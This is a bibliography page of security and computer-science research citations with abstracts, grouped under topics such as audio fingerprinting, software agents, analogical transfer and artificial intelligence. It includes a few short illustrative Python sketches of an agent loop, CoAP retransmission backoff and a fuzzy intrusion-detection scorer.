  • Coover, Bob; Han, Jinyu, "A Power Mask Based Audio Fingerprint," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.1394,1398, 4-9 May 2014. (ID#:14-1606) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853826&isnumber=6853544 The Philips audio fingerprint[1] has been used for years, but its robustness against external noise has not been studied accurately. This paper shows the Philips fingerprint is noise resistant, and is capable of recognizing music that is corrupted by noise at a 4 to 7 dB signal to noise ratio. In addition, the drawbacks of the Philips fingerprint are addressed by utilizing a "Power Mask" in conjunction with the Philips fingerprint during the matching process. This Power Mask is a weight matrix given to the fingerprint bits, which allows mismatched bits to be penalized according to their relevance in the fingerprint. The effectiveness of the proposed fingerprint was evaluated by experiments using a database of 1030 songs and 1184 query files that were heavily corrupted by two types of noise at varying levels. Our experiments show the proposed method has significantly improved the noise resistance of the standard Philips fingerprint. Keywords: Audio Fingerprint; Music Recognition
  • Moussallam, Manuel; Daudet, Laurent, "A general framework for dictionary based audio fingerprinting," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.3077,3081, 4-9 May 2014. (ID#:14-1607) URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854166&isnumber=6853544 Fingerprint-based audio recognition systems must address concurrent objectives. Indeed, fingerprints must be both robust to distortions and discriminative while their dimension must remain low to allow fast comparison. This paper proposes to restate these objectives as a penalized sparse representation problem. On top of this dictionary-based approach, we propose a structured sparsity model in the form of a probabilistic distribution for the sparse support. A practical suboptimal greedy algorithm is then presented and evaluated on robustness and recognition tasks. We show that some existing methods can be seen as particular cases of this algorithm and that the general framework allows to reach other points of a Pareto-like continuum. Keywords: Audio Fingerprinting; Sparse Representation
  • Wen-Long Chin, Trong Nghia Le, Chun-Lin Tseng, Wei-Che Kao, Chun-Shen Tsai, Chun-Wei Kao, "Cooperative Detection Of Primary User Emulation Attacks Based On Channel-Tap Power In Mobile Cognitive Radio Networks," International Journal of Ad Hoc and Ubiquitous Computing, Volume 15 Issue 4, May 2014, Pages 263-274. (ID#:14-1608) URL: http://dl.acm.org/citation.cfm?id=2629824.2629828&coll=DL&dl=GUIDE&CFID=514607536&CFTOKEN=40141344 This paper discusses a novel approach to determine primary user emulation attacks (PUEA) in mobile cognitive radio (CR) networks. This method focuses on identifying such attacks when there is a low signal-to-noise ratio (SNR) on the network. Users are directly detected through the physical layer (PHY), using channel-tap power as an identifying radio-frequency (RF) fingerprint. Fixed sample size test (FSST) and Sequential probability ratio test (SPRT) are employed to combat the issue of effective performance in fading channels. Results are discussed. Keywords: (not provided)

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Agents



In computer science, a software agent is a computer program that acts on behalf of a user or other program. Specific types of agents include intelligent agents, autonomous agents, distributed agents, multi-agent systems and mobile agents. Because of the variety of agents and the privileges agents have to represent the user or program, they are of significant cybersecurity community research interest.
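
As a concrete illustration of the definition above, the sketch below shows the sense-decide-act loop that most agent architectures share; it is a minimal sketch, not any particular agent framework, and the class and method names are hypothetical. Standard-library Python only.

    from abc import ABC, abstractmethod

    class Agent(ABC):
        """An agent repeatedly observes its environment, chooses an action
        on behalf of its principal (a user or another program), and acts."""

        @abstractmethod
        def perceive(self, environment): ...

        @abstractmethod
        def decide(self, percept): ...

        @abstractmethod
        def act(self, action, environment): ...

        def step(self, environment):
            """One sense-decide-act cycle."""
            percept = self.perceive(environment)
            action = self.decide(percept)
            self.act(action, environment)

    class ThresholdAgent(Agent):
        """Toy monitoring agent: flags readings that exceed a limit."""
        def __init__(self, limit):
            self.limit = limit
        def perceive(self, environment):
            return environment["reading"]
        def decide(self, percept):
            return "alert" if percept > self.limit else "ignore"
        def act(self, action, environment):
            environment["last_action"] = action

    env = {"reading": 42.0}
    ThresholdAgent(limit=10.0).step(env)  # env["last_action"] becomes "alert"

Intelligent, distributed, and mobile agents elaborate this same loop with goals, inter-agent messaging, or migration between hosts, which is precisely what makes their privileges and security properties a research concern.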

  • Cain, Ashley A.; Schuster, David, "Measurement of situation awareness among diverse agents in cyber security," Cognitive Methods in Situation Awareness and Decision Support (CogSIMA), 2014 IEEE International Inter-Disciplinary Conference on , vol., no., pp.124,129, 3-6 March 2014. (ID#:14-1609) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816551&isnumber=6816529 Development of innovative algorithms, metrics, visualizations, and other forms of automation are needed to enable network analysts to build situation awareness (SA) from large amounts of dynamic, distributed, and interacting data in cyber security. Several models of cyber SA can be classified as taking an individual or a distributed approach to modeling SA within a computer network. While these models suggest ways to integrate the SA contributed by multiple actors, implementing more advanced data center automation will require consideration of the differences and similarities between human teaming and human-automation interaction. The purpose of this paper is to offer guidance for quantifying the shared cognition of diverse agents in cyber security. The recommendations presented can inform the development of automated aids to SA as well as illustrate paths for future empirical research. Keywords: Automation; Autonomous agents; Cognition; Computer security; Data models; Sociotechnical systems; Situation awareness; cognition; cyber security; information security; teamwork

  • Leal, E.T.; Chiotti, O.; Villarreal, P.D., "Software Agents for Management Dynamic Inter-Organizational Collaborations," Latin America Transactions, IEEE (Revista IEEE America Latina) , vol.12, no.2, pp.330,341, March 2014. (ID#:14-1610) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6749556&isnumber=6749519 The globalization, modern markets, as well as new organizational management philosophies and advances in Information and Communications Technologies, encourage organizations to establish collaboration networks or inter-organizational collaborations. In this paper we propose a technology solution based on software agents which allows supporting the management of collaborative business processes in environments dynamic inter-organizational collaborations. First, we propose a software agent platform that integrates in agent specification's the notions of Belief-Desire-Intention agent architecture with functionalities of process-aware information systems. The platform enables organizations to negotiate collaborations agreements in electronic format to establish dynamic inter-organizational collaborations and define the collaborative processes to be executed. Second, we propose a methodology that includes methods based on Model-Driven Development, which enable the generation of executable process models and the code of process-oriented agents, derived from conceptual models of collaborative processes. This methodology and methods are implemented and automated by software agents that enable the generations of these implementation artifacts, at run-time of the platform. Therefore, the platform enables the automatic generation of the technology solution that requires each organization to execute the agreed collaborative processes, where the generated artifacts are built and initialized in the platform, allowing the implementation and execution of these processes. In this way, the proposed agent-based platform allows to establish collaboration among heterogeneous and autonomous organizations focusing in the process-oriented integration. Keywords: business data processing; globalization; groupware; organizational aspects; software agents; software architecture; agent specification; agent-based platform; automatic generation; autonomous organization; belief-desire-intention agent architecture; collaboration networks; collaborations agreements; collaborative business processes; collaborative processes; dynamic interorganizational collaborations; electronic format; executable process models; globalization; heterogeneous organizations; information and communications technology; management dynamic interorganizational collaboration; model-driven development; organizational management philosophy; process-aware information systems; process-oriented agents; process-oriented integration; software agent platform; software agents; Adaptation models; Collaboration; Organizations; Software agents; Unified modeling language; Collaborative Business Process; Dynamic Inter-Organizational Collaborations; Model-Driven Development; Software Agents

  • Xu, J.; Song, Y.; van der Schaar, M., "Sharing in Networks of Strategic Agents," Selected Topics in Signal Processing, IEEE Journal of, vol.PP, no.99, pp.1,1, April 2014. (ID#:14-1611) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6787069&isnumber=5418892 In social, economic and engineering networks, connected agents need to cooperate by repeatedly sharing information and/or goods. Typically, sharing is costly and there are no immediate benefits for agents who share. Hence, agents who strategically aim to maximize their own individual utilities will "free-ride" because they lack incentives to cooperate/share, thereby leading to inefficient operation or even collapse of networks. To incentivize the strategic agents to cooperate with each other, we design distributed rating protocols which exploit the ongoing nature of the agents' interactions to assign ratings and through them, determine future rewards and punishments: agents that have behaved as directed enjoy high ratings - and hence greater future access to the information/goods of others; agents that have not behaved as directed enjoy low ratings - and hence less future access to the information/goods of others. Unlike existing rating protocols, the proposed protocol operates in a distributed manner and takes into consideration the underlying interconnectivity of agents as well as their heterogeneity. We prove that in many networks, the price of anarchy (PoA) obtained by adopting the proposed rating protocols is 1, that is, the optimal social welfare is attained. In networks where PoA is larger than 1, we show that the proposed rating protocol significantly outperforms existing incentive mechanisms. Last but not least, the proposed rating protocols can also operate efficiently in dynamic networks, where new agents enter the network over time. Keywords: (not provided)

  • Khac Duc Do, "Bounded Assignment Formation Control of Second-Order Dynamic Agents," Mechatronics, IEEE/ASME Transactions on , vol.19, no.2, pp.477,489, April 2014. (ID#:14-1612) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6464623&isnumber=6746080 A constructive design of bounded formation controllers is proposed to force N mobile agents with second-order dynamics to track N reference trajectories and to avoid collision between them. Instead of a prior assignation of the reference trajectories to the agents, optimal assignment algorithms are used to assign desired reference trajectories to the agents to obtain optimal criteria such as linear summation and bottleneck functions of the initial traveling distances of the agents. After the reference trajectories are optimally assigned, the bounded formation control design is based on a new bounded control design technique for second-order systems and new pairwise collision avoidance functions. The pairwise collision functions are functions of both relative positions and relative velocities of the agents instead of only relative positions as in the literature. The proposed results are illustrated on a group of underactuated omnidirectional intelligent navigators in a vertical plane. Keywords: collision avoidance; control system synthesis; mobile robots; robot dynamics; N-reference trajectory tracking; bottleneck functions; bounded assignment formation control constructive design ;initial traveling distances; linear summation; mobile agents; optimal assignment algorithms; optimal criteria; pairwise collision functions; second-order dynamic agent system; underactuated omnidirectional intelligent navigators; vertical plane; Algorithm design and analysis; Collision avoidance; Control design; Shape; Stability analysis; Trajectory; Vectors; Assignment; bounded formation control; collision avoidance; potential functions; second-order agents

  • Clark, A.; Alomair, B.; Bushnell, L.; Poovendran, R., "Minimizing Convergence Error in Multi-Agent Systems Via Leader Selection: A Supermodular Optimization Approach," Automatic Control, IEEE Transactions on , vol.59, no.6, pp.1480,1494, June 2014. (ID#:14-1613) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6727405&isnumber=6819104 In a leader-follower multi-agent system (MAS), the leader agents act as control inputs and influence the states of the remaining follower agents. The rate at which the follower agents converge to their desired states, as well as the errors in the follower agent states prior to convergence, are determined by the choice of leader agents. In this paper, we study leader selection in order to minimize convergence errors experienced by the follower agents, which we define as a norm of the distance between the follower agents' intermediate states and the convex hull of the leader agent states. By introducing a novel connection to random walks on the network graph, we show that the convergence error has an inherent supermodular structure as a function of the leader set. Supermodularity enables development of efficient discrete optimization algorithms that directly approximate the optimal leader set, provide provable performance guarantees, and do not rely on continuous relaxations. We formulate two leader selection problems within the supermodular optimization framework, namely, the problem of selecting a fixed number of leader agents in order to minimize the convergence error, as well as the problem of selecting the minimum-size set of leader agents to achieve a given bound on the convergence error. We introduce algorithms for approximating the optimal solution to both problems in static networks, dynamic networks with known topology distributions, and dynamic networks with unknown and unpredictable topology distributions. Our approach is shown to provide significantly lower convergence errors than existing random and degree-based leader selection methods in a numerical study. Keywords: Approximation algorithms; Convergence; Heuristic algorithms; Network topology; Optimization; Topology; Upper bound; Multi-agent system (MAS)

  • Dayong Ye; Minjie Zhang; Sutanto, D., "Cloning, Resource Exchange, and Relation Adaptation: An Integrative Self-Organization Mechanism in a Distributed Agent Network," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.4, pp.887,897, April 2014. (ID#:14-1614) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6506072&isnumber=6750096 Self-organization provides a suitable paradigm for developing self-managed complex distributed systems, such as grid computing and sensor networks. In this paper, an integrative self-organization mechanism is proposed. Unlike current related studies, which propose only a single principle of self-organization, this mechanism synthesizes the three principles of self-organization: cloning/spawning, resource exchange and relation adaptation. Based on this mechanism, an agent can autonomously generate new agents when it is overloaded, exchange resources with other agents if necessary, and modify relations with other agents to achieve a better agent network structure. In this way, agents can adapt to dynamic environments. The proposed mechanism is evaluated through a comparison with three other approaches, each of which represents state-of-the-art research in each of the three self-organisation principles. Experimental results demonstrate that the proposed mechanism outperforms the three approaches in terms of the profit of individual agents and the entire agent network, the load-balancing among agents, and the time consumption to finish a simulation run. Keywords: distributed processing; multi-agent systems; resource allocation; agent network structure; autonomous agent generation; cloning principle; distributed agent network; grid computing; integrative self-organization mechanism; load-balancing; relation adaptation principle; resource exchange principle; self-managed complex distributed systems; self-organization principle; sensor networks; simulation run; spawning principle; Cloning; Equations; Layout; Mathematical model; Multi-agent systems; Nickel; Resource management; Distributed multi-agent system; reinforcement learning; self-organization

  • Isidori, A.; Marconi, L.; Casadei, G., "Robust Output Synchronization of a Network of Heterogeneous Nonlinear Agents via Nonlinear Regulation Theory," Automatic Control, IEEE Transactions on, vol. PP, no.99, pp.1,1, May 2014. (ID#:14-1615) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6819823&isnumber=4601496 In this paper, we consider the output synchronization problem for a network of heterogeneous diffusively-coupled nonlinear agents. Specifically, we show how the (heterogeneous) agents can be controlled in such a way that their outputs asymptotically track the output of a prescribed nonlinear exosystem. The problem is solved in two steps. In the first step, the problem of achieving consensus among (identical) nonlinear reference generators is addressed. In this respect, it is shown how the techniques recently developed to solve the consensus problem among linear agents can be extended to agents modeled by nonlinear d-dimensional differential equations, under the assumption that the communication graph is connected. In the second step, the theory of nonlinear output regulation is applied in a decentralized control mode, to force the output of each agent of the network to robustly track the (synchronized) output of a local reference model. Simulation results are presented to show the effectiveness of the design methodology. Keywords: Eigenvalues and eigenfunctions; Generators; Mathematical model; Nonlinear systems; Regulators; Synchronization; Trajectory

  • Turguner, Cansin, "Secure fault tolerance mechanism of wireless Ad-Hoc networks with mobile agents," Signal Processing and Communications Applications Conference (SIU), 2014 22nd , vol., no., pp.1620,1623, 23-25 April 2014. (ID#:14-1616) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830555&isnumber=6830164 Mobile ad-hoc networks are dynamic, wireless, self-organizing networks in which many mobile nodes connect weakly to one another. Compared with traditional networks, they suffer failures that prevent the system from working properly, and they must also cope with many security issues such as unauthorized access attempts, security threats, and reliability. Using mobile agents in ad-hoc networks with low-level fault tolerance provides fault masking that users never notice. Mobile agent migration among nodes, autonomous selection of alternative paths, and high-level fault tolerance make networks with low bandwidth and high failure ratios more reliable. This paper describes the fault tolerance properties of mobile agents and existing fault tolerance methods based on them, and, for ad-hoc networks that need security precautions beyond fault tolerance, presents a new model: the Secure Mobile Agent Based Fault Tolerance Model. Keywords: Ad hoc networks; Conferences; Erbium; Fault tolerance; Fault tolerant systems; Mobile agents; Signal processing; Ad-Hoc network; fault tolerance; mobile agent; related works; secure communication


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Analogical Transfer


Analogical transfer is a psychology theory concerned with overcoming fixed ways of viewing particular problems or objects. In security, this problem manifests when system developers and administrators overlook critical security requirements for lack of tools and techniques that let them tailor security knowledge to their particular context. The three works cited here use analogy and simulations to achieve breakthrough thinking. The first paper was presented at HotSoS 2014, the Symposium and Bootcamp on the Science of Security, a research event held April 8-9, 2014 in Raleigh, North Carolina.

  • Ashwini Rao, Hanan Hibshi, Travis Breaux, Jean-Michel Lehker, Jianwei Niu. "Less is More? Investigating the Role of Examples in Security Studies using Analogical Transfer" HOT SoS 2014. (ID#:14-1359) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf To explore the impact of new security methods, experts must improve our ability to study the impact of security tools and methods on software and system development. This paper presents initial results of an experiment to assess the extent to which the number and type of examples used in security training stimuli can impact security problem solving. Keywords: Security; Human Factors; Psychology; Analogical Transfer
  • Robert Ganian, Petr Hlineny, Jan Obdrzalek, "Better Algorithms for Satisfiability Problems for Formulas of Bounded Rank-width," Fundamenta Informaticae - MFCS & CSL 2010 Satellite Workshops: Selected Papers, Volume 123 Issue 1, January 2013. (Pages 59-76) IOS Press, Amsterdam, The Netherlands. (ID#:14-1360) Available at: http://dl.acm.org/citation.cfm?id=2594865.2594870&coll=DL&dl=GUIDE&CFID=445385349&CFTOKEN=72920989 or http://dx.doi.org/10.3233/FI-2013-800 We provide a parameterized algorithm for the propositional model counting problem #SAT, the runtime of which has a single-exponential dependency on the rank-width of the signed graph of a formula. That is, our algorithm runs in time $\mathcal{O}(t^3 \cdot 2^{3t(t+1)/2} \cdot \vert\phi\vert)$ for a width-$t$ rank-decomposition of the input formula $\phi$, and can be of practical interest for small values of rank-width. Previously, analogous algorithms have been known -- e.g., by Fischer, Makowsky, and Ravve -- with a single-exponential dependency on the clique-width $k$ of the signed graph of a formula with a given $k$-expression. Our algorithm presents an exponential runtime improvement over the worst-case scenario of the previous one, since clique-width reaches up to exponentially higher values than rank-width. We also provide an algorithm for the MAX-SAT problem along the same lines.
  • August Betzler, Carles Gomez, Ilker Demirkol, Josep Paradells. "Congestion control in reliable CoAP communication" MSWiM '13 Proceedings of the 16th ACM international conference on Modeling, analysis & simulation of wireless and mobile systems. November 2013. (Pages 365-372). (ID#:14-1361) Available at: http://doi.acm.org/10.1145/2507924.2507954 The development of IPv6 stacks for wireless constrained devices that have limited hardware resources has paved the way for many new areas of applications and protocols. The Constrained Application Protocol (CoAP) has been designed by the IETF to enable the manipulation of resources for constrained devices that are capable of connecting to the Internet. Due to the limited radio channel capacities and hardware resources, congestion is a common phenomenon in networks of constrained devices. CoAP implements a basic congestion control mechanism for the transmission of reliable messages. Alternative CoAP congestion control approaches are a recent topic of interest in the IETF CoRE Working Group. New Internet-Drafts discuss the limitations of the default congestion control mechanisms and propose alternative ones, yet there have been no studies in the literature that compare the original approach to the alternative ones. In this paper, we target this crucial study and perform evaluations that show how the default and alternative congestion control mechanisms compare to each other. We use the Cooja simulation environment, which is part of the Contiki development toolset, to simulate CoAP within a complete protocol stack that uses IETF protocols for constrained networks. Through simulations of different network topologies and varying traffic loads, we demonstrate how the advanced mechanisms proposed in the drafts perform relative to the basic congestion control mechanism. Keywords: Applications (SMTP, FTP, etc.); Protocol architecture (OSI model)
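
For context on the preceding citation: the basic congestion control in base CoAP (published as RFC 7252) amounts to a binary exponential backoff on confirmable messages. The sketch below is a minimal illustration of that default timer logic using the RFC's default transmission parameters; it is background for the comparison in the paper, not the authors' simulation code.

    import random

    # RFC 7252 default transmission parameters for confirmable messages.
    ACK_TIMEOUT = 2.0        # seconds
    ACK_RANDOM_FACTOR = 1.5
    MAX_RETRANSMIT = 4

    def retransmission_schedule():
        """Yield the wait (in seconds) before each transmission attempt.

        The initial timeout is drawn uniformly from
        [ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR] and doubles after
        every retransmission, for MAX_RETRANSMIT + 1 attempts in total.
        """
        timeout = random.uniform(ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR)
        for _ in range(MAX_RETRANSMIT + 1):
            yield timeout
            timeout *= 2

    print([round(t, 2) for t in retransmission_schedule()])
    # e.g. [2.73, 5.46, 10.92, 21.84, 43.68]

The randomized initial timeout desynchronizes retransmissions from neighboring nodes, which matters in the constrained, lossy networks the paper simulates; the alternative mechanisms discussed in the Internet-Drafts adapt these timers to observed network feedback instead.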

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Artificial Intelligence

Artificial Intelligence


John McCarthy coined the term "Artificial Intelligence" in 1955. He defined it as "the science and engineering of making intelligent machines" (as quoted in Poole, Mackworth & Goebel, 1998). AI research is highly technical and specialized, and has been characterized as "deeply divided into subfields that often fail to communicate with each other" (McCorduck, Pamela (2004), Machines Who Think, 2nd ed.). These divisions are attributed to both technical and social factors. The research cited here looks at the divisions and viewpoints and includes an overview of the current science of artificial intelligence, also known as intelligent computing.

  • Usha Gayatri, P.; Neeraja S.; Leela Poornima, Ch.; Chandra Sekharaiah, K.; Yuvaraj, M., "Exploring Cyber Intelligence Alternatives For Countering Cyber Crime," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on, vol., no., pp.900,902, 5-7 March 2014. (ID#:14-1621) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828093&isnumber=6827395 In this paper, a case study of cyber crime is presented in the context of the JNTUHJAC website. CERT-In is identified as the organization relevant to handling this kind of cybercrime. This paper is an attempt to find and do away with the lacunae in the prevailing cyber laws, the I.T. Act 2000, and the related amendment act of 2008, such that the law takes cognizance of all kinds of cybercrimes perpetrated against individuals, societies, and nations. It is found that ICANN is an organization that can control cyberspace by blocking space wherein the content involves a cognizable offence. Keywords: Artificial intelligence; Computer crime; Context; Cyberspace; Handheld computers; Internet; Organizations; Artificial Intelligence (AI); Collective Intelligence (CI); Information Technology (IT); Information and Communication Technologies (ICTs); Web Intelligence (WI)
  • Mijumbi, Rashid; Gorricho, Juan-Luis; Serrat, Joan; Claeys, Maxim; De Turck, Filip; Latre, Steven, "Design and evaluation of learning algorithms for dynamic resource management in virtual networks," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. (ID#:14-1622) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838258&isnumber=6838210 Network virtualization is considerably gaining attention as a solution to ossification of the Internet. However, the success of network virtualization will depend in part on how efficiently the virtual networks utilize substrate network resources. In this paper, we propose a machine learning-based approach to virtual network resource management. We propose to model the substrate network as a decentralized system and introduce a learning algorithm in each substrate node and substrate link, providing self-organization capabilities. We propose a multiagent learning algorithm that carries out the substrate network resource management in a coordinated and decentralized way. The task of these agents is to use evaluative feedback to learn an optimal policy so as to dynamically allocate network resources to virtual nodes and links. The agents ensure that while the virtual networks have the resources they need at any given time, only the required resources are reserved for this purpose. Simulations show that our dynamic approach significantly improves the virtual network acceptance ratio and the maximum number of accepted virtual network requests at any time while ensuring that virtual network quality of service requirements such as packet drop rate and virtual link delay are not affected. Keywords: Bandwidth; Delays; Dynamic scheduling; Heuristic algorithms; Learning (artificial intelligence);Resource management; Substrates; Artificial Intelligence; Dynamic Resource Allocation; Machine Learning; Multiagent Systems; Network virtualization; Reinforcement Learning; Virtual Network Embedding
  • Lamperti, G.; Zhao, X., "Diagnosis of Active Systems by Semantic Patterns," Systems, Man, and Cybernetics: Systems, IEEE Transactions on, vol.PP, no.99, pp.1,1, January 2014. (ID#:14-1623) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6725692&isnumber=6376248 A gap still exists between complex discrete-event systems (DESs) and the effectiveness of the state-of-the-art diagnosis techniques, where faults are defined at component levels and diagnoses incorporate the occurrences of component faults. All these approaches to diagnosis are context-free, inasmuch as diagnosis is anchored to components, irrespective of the context in which they are embedded. By contrast, since complex DESs are naturally organized in hierarchies of contexts, different diagnosis rules are to be defined for different contexts. Diagnosis rules are specified based on associations between context-sensitive faults and regular expressions, called semantic patterns. Since the alphabets of such regular expressions are stratified, so that the semantic patterns of a context are defined based on the interface symbols of its subcontexts only, separation of concerns is achieved, and the expressive power of diagnosis is enhanced. This new approach to diagnosis is bound to seemingly contradictory but nonetheless possible scenarios: a DES can be normal despite the faulty behavior of a number of its components; also, it can be faulty despite the normal behavior of all its components. Keywords: Automata; Circuit faults; Context; History; Monitoring; Semantics; Syntactics; Artificial intelligence; decision support systems; discrete-event systems (DESs); fault diagnosis; intelligent systems
  • Wolff, J.G., "Big Data and the SP Theory of Intelligence," Access, IEEE , vol.2, no., pp.301,315, 2014. (ID#:14-1624) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6782396&isnumber=6705689 This paper is about how the SP theory of intelligence and its realization in the SP machine may, with advantage, be applied to the management and analysis of big data. The SP system-introduced in this paper and fully described elsewhere-may help to overcome the problem of variety in big data; it has potential as a universal framework for the representation and processing of diverse kinds of knowledge, helping to reduce the diversity of formalisms and formats for knowledge, and the different ways in which they are processed. It has strengths in the unsupervised learning or discovery of structure in data, in pattern recognition, in the parsing and production of natural language, in several kinds of reasoning, and more. It lends itself to the analysis of streaming data, helping to overcome the problem of velocity in big data. Central in the workings of the system is lossless compression of information: making big data smaller and reducing problems of storage and management. There is potential for substantial economies in the transmission of data, for big cuts in the use of energy in computing, for faster processing, and for smaller and lighter computers. The system provides a handle on the problem of veracity in big data, with potential to assist in the management of errors and uncertainties in data. It lends itself to the visualization of knowledge structures and inferential processes. A high-parallel, open-source version of the SP machine would provide a means for researchers everywhere to explore what can be done with the system and to create new versions of it. Keywords: Big Data; data analysis; data compression; data mining; data structures; natural language processing; unsupervised learning; Bid Data analysis; Big Data management; SP machine; SP theory of intelligence; data structure discovery; error management; high-parallel open-source version; inferential processes; knowledge structure visualization; lossless compression; natural language production; pattern recognition; streaming data analysis; unsupervised learning; Cognition; Computers; Data handling; Data storage systems; Information management; Licenses; Natural languages; Artificial intelligence; big data; cognitive science; computational efficiency; data compression; data-centric computing; energy efficiency; pattern recognition; uncertainty; unsupervised learning
  • Zhu, B.B.; Yan, J.; Guanbo Bao; Maowei Yang; Ning Xu, "Captcha as Graphical Passwords--A New Security Primitive Based on Hard AI Problems," Information Forensics and Security, IEEE Transactions on, vol.9, no.6, pp.891,904, June 2014. (ID#:14-1625) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6775249&isnumber=6803967 Many security primitives are based on hard mathematical problems. Using hard AI problems for security is emerging as an exciting new paradigm, but has been under-explored. In this paper, we present a new security primitive based on hard AI problems, namely, a novel family of graphical password systems built on top of Captcha technology, which we call Captcha as graphical passwords (CaRP). CaRP is both a Captcha and a graphical password scheme. CaRP addresses a number of security problems altogether, such as online guessing attacks, relay attacks, and, if combined with dual-view technologies, shoulder-surfing attacks. Notably, a CaRP password can be found only probabilistically by automatic online guessing attacks even if the password is in the search set. CaRP also offers a novel approach to address the well-known image hotspot problem in popular graphical password systems, such as PassPoints, that often leads to weak password choices. CaRP is not a panacea, but it offers reasonable security and usability and appears to fit well with some practical applications for improving online security. Keywords: artificial intelligence; security of data; CaRP password; Captcha as graphical passwords; PassPoints; artificial intelligence; automatic online guessing attacks; dual-view technologies; hard AI problems; hard mathematical problems; image hotspot problem; online security; password choices; relay attacks; search set; security primitives; shoulder-surfing attacks; Animals; Artificial intelligence; Authentication; CAPTCHAs; Usability; Visualization; CaRP; Captcha; Graphical password; dictionary attack; hotspots; password; password guessing attack; security primitive
  • Chaudhary, A.; Kumar, A.; Tiwari, V.N., "A reliable solution against Packet dropping attack due to malicious nodes using fuzzy Logic in MANETs," Optimization, Reliability, and Information Technology (ICROIT), 2014 International Conference on, vol., no., pp.178,181, 6-8 Feb. 2014. (ID#:14-1626) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798326&isnumber=6798279 The recent trend of mobile ad hoc networks increases the capability and impregnability of communication between mobile nodes. Mobile ad hoc networks are completely free of pre-existing infrastructure or authentication points, so all mobile nodes that want to communicate with each other immediately form the topology and initiate requests to send or receive data packets. From a security perspective, communication between mobile nodes via wireless links makes these networks more susceptible to internal or external attacks, because anyone can join or leave the network at any time. In general, the packet dropping attack through malicious node(s) is one of the possible attacks on a mobile ad hoc network. This paper develops an intrusion detection system using fuzzy logic to detect packet dropping attacks in mobile ad hoc networks and to remove the malicious nodes in order to save the resources of mobile nodes. For implementation, the Qualnet 6.1 simulator and the Mamdani fuzzy inference system are used to analyze the results. Simulation results show that the system detects dropping attacks with a high detection rate and a low false positive rate. Keywords: fuzzy logic; inference mechanisms; mobile ad hoc networks; mobile computing; security of data; MANET; Mamdani fuzzy inference system; Qualnet simulator 6.1; data packets; fuzzy logic; intrusion detection system; malicious nodes; mobile ad hoc network; mobile nodes; packet dropping attack; wireless links; Ad hoc networks; Artificial intelligence; Fuzzy sets; Mobile computing; Reliability engineering; Routing; Fuzzy Logic; Intrusion Detection System (IDS); MANETs Security Issues; Mobile Ad Hoc networks (MANETs); Packet Dropping attack
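
To make the fuzzy-inference step in the preceding citation concrete, the toy sketch below applies Mamdani-style inference to a single observed feature (a node's packet-drop ratio) and defuzzifies by centroid to obtain a maliciousness score. The membership functions and the two rules are invented for illustration; the paper's system runs in the Qualnet 6.1 simulator with richer inputs.

    def tri(x, a, b, c):
        """Triangular membership function rising from a, peaking at b, falling to c."""
        if x <= a or x >= c:
            return 0.0
        return (x - a) / (b - a) if x < b else (c - x) / (c - b)

    def malicious_score(drop_ratio):
        """Two Mamdani rules (assumed): LOW drop -> LOW score, HIGH drop -> HIGH score."""
        fire_low = tri(drop_ratio, -0.4, 0.0, 0.4)    # firing strength of rule 1
        fire_high = tri(drop_ratio, 0.2, 1.0, 1.8)    # firing strength of rule 2
        num = den = 0.0
        for i in range(101):                          # sampled output universe [0, 1]
            y = i / 100.0
            # Clip each output set by its rule's firing strength, then aggregate by max.
            mu = max(min(fire_low, tri(y, -0.4, 0.0, 0.4)),
                     min(fire_high, tri(y, 0.2, 1.0, 1.8)))
            num += y * mu
            den += mu
        return num / den if den else 0.0              # centroid defuzzification

    print(round(malicious_score(0.05), 2))  # well-behaved node -> score near 0
    print(round(malicious_score(0.70), 2))  # heavy dropper -> score near 1

A node whose score crosses a threshold would be flagged and excluded from routing, which is the "detect and remove" step the abstract describes.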

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Computer Science as a Theoretical Science

Computer Science as a Theoretical Science


